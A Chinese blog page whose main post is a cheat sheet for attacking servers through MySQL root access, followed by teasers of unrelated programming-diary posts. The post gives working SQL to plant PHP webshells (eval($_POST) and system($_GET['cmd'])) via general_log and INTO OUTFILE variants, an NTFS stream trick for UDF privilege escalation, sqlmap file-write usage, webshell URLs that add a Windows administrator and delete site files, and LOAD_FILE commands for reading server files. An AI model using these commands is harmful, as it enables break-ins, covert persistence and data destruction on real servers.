当前位置：首页 > news >正文

mysql数据库root权限读写文件

news 2026/2/7 23:57:29

如果没有shell，只有数据库权限的情况下：

1. udf 提权提示没有目录：使用数据流创建目录

1.  select 'xxx' into outfile 'C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\::$INDEX_ALLOCATION';2.  select 'xxx' into outfile 'C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\\plugin\::$INDEX_ALLOCATION';

2. 日志写shell

show variables like '%general%';  查看日志状态
SET GLOBAL general_log='on'     开启日志读写
SET GLOBAL general_log_file='C:/phpStudy/WWW/x.php';  指定需要写入日志路径
SELECT '<?php eval($_POST["cmd"]);?>'  写日志进x.php

3. mysql直接写shell

1.  select '<?php  phpinfo();?>'  into outfile 'D:/UPUPW_AP7.2_64/htdocs/infoshell.php'2.  select "<?if($_GET['cmd']) {  system($_GET['cmd']);  }?>"  into outfile 'D:/UPUPW_AP7.2_64/htdocs/info2.php'lines terminated by 写入：
select into outfile 'C:/wamp64/www/shell.php' lines terminated by '<?php phpinfo()?>';
//lines terminated by 可以理解为 以每行终止的位置添加 xx 内容。lines starting by 写入：
select into outfile 'C:/wamp64/www/shell.php' lines starting by '<?php phpinfo()?>';
//利用 lines starting by 语句拼接webshell的内容。lines starting by 可以理解为 以每行开始的位置添加 xx 内容。fields terminated by 写入：
select into outfile 'C:/wamp64/www/work/shell.php' fields terminated by '<?php phpinfo() ?>';
//利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。columns terminated by 写入：
select into outfile 'C:/wamp64/www/shell.php' COLUMNS terminated by '<?php phpinfo() ?>';
//利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。sqlmap写入：
写：(要写的文件，必须在kali本机里有)写入到 /tmp 目录下  sqlmap -u "http://127.0.0.1/index.php?page=user-info.php&username=a%27f%27v&password=af999 --file-write="shell.php"  --file-dest="/tmp/shell.php"


https://sys.baidu.com/info2.php?cmd=net+user+jiance+jiance@123+/addhttps://sys.baidu.com/info2.php?cmd=net+localgroup+administrators+jiance+/addhttps://sysbaidu.com/info2.php?cmd=del+D:\UPUPW_AP7.2_64\htdocs\*.php

4. mysql读文件

1. SELECT LOAD_FILE('D:\UPUPW_AP7.2_64\Apache2\conf\httpd-vhosts.conf');

mysql低权限读文件：1.  CREATE TABLE `bbs` (`bbs1` TEXT NOT NULL );  # 创建表：
2.  load data local infile '//home//opendb.php' into table  `bbs`; #越权限读文件   
3.  LOAD DATA LOCAL INFILE '/home/opendb.php' into table bbs fields terminated by '' LINES TERMINATED BY '\0';  # 我读出来是这样的 <?     ?>  读别的也是 include的部分就没读取了怀疑是转义了

mysql数据库root权限读写文件

如果没有shell，只有数据库权限的情况下： 1. udf 提权提示没有目录：使用数据流创建目录 1. select xxx into outfile C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\::$INDEX_ALLOCATION;2. select xxx into outfile C:\\phpstudy_pro\…...

编程日记 2024/3/7 19:13:26

力扣爆刷第88天之hot100五连刷26-30

力扣爆刷第88天之hot100五连刷26-30 文章目录力扣爆刷第88天之hot100五连刷26-30一、142. 环形链表 II二、21. 合并两个有序链表三、2. 两数相加四、19. 删除链表的倒数第 N 个结点五、24. 两两交换链表中的节点一、142. 环形链表 II 题目链接：https://leetcode.…...

编程日记 2024/3/7 19:12:25

Ethersacn的交易数据是什么样的（2）

分析 Raw Transanction RLP（Recursive Length Prefix）是一种以太坊中用于序列化数据的编码方式。它被用于将各种数据结构转换为二进制格式，以便在以太坊中传输和存储。RLP 是一种递归的编码方式，允许对复杂的数据结构进行编码。所…...

编程日记 2024/3/7 19:11:24

学习Android的第二十二天

目录 Android ContextMenu 上下文菜单 ContextMenu 范例参考文档 Android SubMenu 子菜单范例参考文档 Android PopupMenu 弹出菜单范例参考文档 Android ContextMenu 上下文菜单在Android开发中，ContextMenu（上下文菜单）为…...

编程日记 2024/3/7 19:09:22

JavaScript——流程控制（程序结构）

JavaScript——流程控制（程序结构） 流程控制就是来控制我们的代码按照什么结构顺序来执行。更倾向于一种思想结构。流程控制分为三大结构：顺序结构、分支结构、循环结构 1、顺序结构代码从上往下依次执行，从A到B执行&#x…...

编程日记 2024/3/7 19:08:21

如何用ChatGPT+GEE+ENVI+Python进行高光谱，多光谱成像遥感数据处理？

原文链接：如何用ChatGPTGEEENVIPython进行高光谱，多光谱成像遥感数据处理？ 第一：遥感科学从摄影侦察到卫星图像遥感的基本原理遥感的典型应用第二：ChatGPT ChatGPT可以做什么？ ChatGPT演示使用 …...

编程日记 2024/3/7 19:06:19

AIGC工具（ 7个）

人工智能技术有好的一方面，又不好的地方，要区别对待，吸取精华，去其糟粕。目前市场上有很多AI大模型，可以支持聊天，写文稿，创作等，部分可以生成图片，以下是7个很不错的免费…...

编程日记 2024/3/7 19:05:18

学习Java的第一天

一、Java简介 Java 是由 Sun Microsystems 公司于 1995 年 5 月推出的 Java 面向对象程序设计语言和 Java 平台的总称。由 James Gosling和同事们共同研发，并在 1995 年正式推出。后来 Sun 公司被 Oracle （甲骨文）公司收购，Jav…...

编程日记 2024/3/7 19:04:16

【设计模式】工厂模式与抽象工厂模式

工厂方法以图书馆管理系统为例，需要API提供查询不同专业分类的书目列表，一般实现， class LibraryManager { public:LibraryManager() {}//按专业分类查询BookList Query(Type type) {if(type TA) {return ...;} else if (type TB) {} el…...

编程日记 2024/3/7 19:03:15

使用plasmo框架开发浏览器插件，注入contents脚本和给页面添加UI组件

plasmo：GitHub - PlasmoHQ/plasmo: 🧩 The Browser Extension Framework plasmo是一个开发浏览器插件的框架，支持使用react和vue等技术，而且不用手动管理manifest.json文件，框架会根据你在框架中的使用，自…...

编程日记 2024/3/7 18:58:10

python并发惰性处理大型数据集

惰性计算是一种编程策略，它使得程序在何时执行计算的决定推迟到需要结果时才进行。这种策略的好处在于，它允许程序处理大规模数据或者需要大量计算的任务时节省内存和计算资源。举例来说，当我们调用 Python 中的 range() 函数时&#xff0c…...

编程日记 2024/3/7 18:57:09

使用register镜像创建私有仓库 [rootopenEuler-node1 ~]# docker run --restartalways -d -p 5000:5000 -v /opt/data/regostry:/var/lib/registry registry:2[rootopenEuler-node1 ~]# docker images REPOSITORY TAG IMAGE…...

编程日记 2024/3/7 18:53:05

[LeetBook]【学习日记】有效数字——状态机

题目有效数字有效数字（按顺序）可以分成以下几个部分： 若干空格一个小数或者整数（可选）一个’e’或’E’，后面跟着一个整数若干空格小数（按顺序）可以分成以下几个部分&#xff1a…...

编程日记 2024/3/7 18:52:04

学习目标2024

技术: 什么是 Nacos apifox 业务: 域统一...

编程日记 2024/3/7 18:51:03

引入js，刷新清除缓存

一、这种会让所有的css/js资源重新加载 <meta http-equiv"pragram" content"no-cache"> <meta http-equiv"cache-control" content"no-cache, no-store, must-revalidate">二、加时间戳每次引入，后面版本号都…...

编程日记 2024/3/7 18:47:59

【VSCODE修改代码行间距】解决方案

在我们编码的过程中，由于显示字体和显示器的不同，会需要调整行间距，在vscode默认的选项中没有看到设定行间距的选项，不过，可以手动修改配置档达到目的。 1.打开设置 2.打开配置档，手动进行设定 3.在选项中添…...

编程日记 2024/3/7 18:46:58

lvs+keepalive

虚拟路由冗余协议(Virtual Router Redundancy Protocol，简称VRRP) VRRP能够在不改变组网的情况下，将多台路由器虚拟成一个虚拟路由器，通过配置虚拟路由器的IP地址为默认网关，实现网关的备份。协议版本: VRRPv2（常用&…...

编程日记 2024/3/7 18:45:56

用spark读取及存储数据

文章目录读取数据存储数据读取数据 data spark.sql("""select * from temp.tables""") data.show(3)# 转成pandas方式 # df data.toPandas() # df.head(3)存储数据 table "temp.new_tables" data.write.format("hive"…...

编程日记 2024/3/7 18:43:55